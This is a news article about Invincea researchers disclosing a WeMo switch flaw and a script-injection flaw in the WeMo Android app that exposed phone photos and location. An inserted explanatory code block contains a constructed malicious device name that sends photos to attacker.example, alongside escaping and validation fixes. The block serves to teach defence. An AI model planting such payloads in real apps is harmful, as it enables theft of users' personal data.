Security Firm to Detail Vulnerabilities in WeMo Switch and Android App

On Friday, at Black Hat Europe, an annual conference for the information security industry, Invincea Labs will detail two security vulnerabilities that it has discovered in smart-home products and an app made by WeMo—one of which would expose a user's smartphone photos and location to an attacker.
By Mary Catherine O'Connor

The Invincea researchers were unable to use WeMo's cloud-based servers as a vector into the devices. This suggests that, to obtain remote root access to a switch, an attacker would first need to get onto the home's Wi-Fi router or into the home's network by some other route. One such route is another poorly secured IoT device on the same network, such as the internet-connected cameras and DVRs that attackers leveraged in recent Distributed Denial of Service (DDoS) attacks on websites.

Invincea's Tanen and Tenaglia both say the vulnerability in the Android smartphone app is likely more disconcerting to consumers than the one in the WeMo switch itself. That's because the attack they built gives access to much of the content stored on a user's smartphone, including its contacts and photos.

The WeMo companion mobile app
"What we did is we set the name of the [WeMo] device to be a malicious string containing JavaScript code," Tenaglia explains. The device name is attacker-controlled data that the app trusts: whenever the smartphone connects to that WeMo device and the app displays its name, the app executes the JavaScript embedded in the string.

"That code allows us to do anything that the app can do," Tanen says, "and the app can access the phone's camera, photos, contacts and location. So we've demonstrated that we can download all the photos from the phone and start beaconing the phone's location back to us."
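The mechanism Tenaglia and Tanen describe, reduced to its essentials as an added example (this is not code from the original article, nor from Invincea or Belkin): a device name that is concatenated unescaped into HTML loaded by the app's web view becomes script running with whatever access the app has. The template, the bridge object name `Android`, its method `uploadPhotos`, the attacker URL and the allowed-character limits are assumptions for illustration, and the payload is constructed for the demo.

```javascript
// Added example (not Invincea's or Belkin's code): a stand-in for an
// app rendering a WeMo device name into its web view, showing how an
// attacker-chosen name becomes executable script, and two fixes.
// The HTML template, the bridge object "Android", uploadPhotos() and the
// attacker URL are assumptions made for illustration.

// Constructed attacker payload: a device "name" carrying JavaScript.
const MALICIOUS_NAME =
  '<script>Android.uploadPhotos("http://attacker.example/c2")</script>';

// Vulnerable pattern: the untrusted name is concatenated straight into
// HTML that the web view will load, so markup in the name is rendered
// and any <script> it contains runs in the app's context.
function renderDeviceVulnerable(name) {
  return '<div class="device">' + name + '</div>';
}

// Fix 1: HTML-entity-encode every untrusted value before placing it in
// HTML text content. These five characters are the ones that can break
// out of a text context.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, ch => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[ch]);
}

function renderDeviceSafe(name) {
  return '<div class="device">' + escapeHtml(name) + '</div>';
}

// Fix 2 (defence in depth): validate the name against an allow-list of
// characters and a length cap at the point it is read from the device,
// so a hostile name is rejected even if a rendering path forgets to
// encode. The character set and 32-character cap are assumptions.
const NAME_RE = /^[A-Za-z0-9 _\-.]{1,32}$/;
function isValidDeviceName(name) {
  return NAME_RE.test(String(name));
}

// Check helper: does the rendered HTML contain a script element that a
// web view would execute?
function containsScript(html) {
  return /<script\b/i.test(html);
}

// Demonstration: the same hostile name through both render paths.
const vuln = renderDeviceVulnerable(MALICIOUS_NAME);
const safe = renderDeviceSafe(MALICIOUS_NAME);
console.log('vulnerable rendering contains script:', containsScript(vuln)); // true
console.log('escaped rendering contains script:', containsScript(safe));    // false
console.log('payload passes allow-list:', isValidDeviceName(MALICIOUS_NAME)); // false
console.log('benign name passes allow-list:', isValidDeviceName('Living Room Lamp')); // true
```

The escaping fix is the one that matters: the allow-list is a second line of defence, not a substitute, because a name validator can be bypassed by any code path that accepts a name without running it. On Android, the usual way in-app JavaScript reaches native features such as the camera, photos or location is a WebView with JavaScript enabled and an object exposed through addJavascriptInterface; the article does not say which mechanism the WeMo app used, only that script in the device name ran with the app's privileges.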

Weak security on IoT devices has led to a number of recent high-profile incidents, including a DDoS attack that temporarily took down many popular websites last month. Yet, Tenaglia says, beyond not being able to reach a website for a time, consumers have not been directly affected by those incidents. By demonstrating that an attacker can not only compromise the app used to control an IoT device but also reach a smartphone's photos and other information most people consider highly personal, Tenaglia and Tanen hope to make digital security around smart-home products a higher priority for consumers.

This is not the first time security researchers have discovered and revealed security holes in WeMo's smart-home products. In early 2014, IOActive, a Seattle-based security firm, revealed that attackers could remotely access and control WeMo devices, install their own malicious firmware on them and, from there, reach the home's computer network. WeMo quickly patched that security hole.
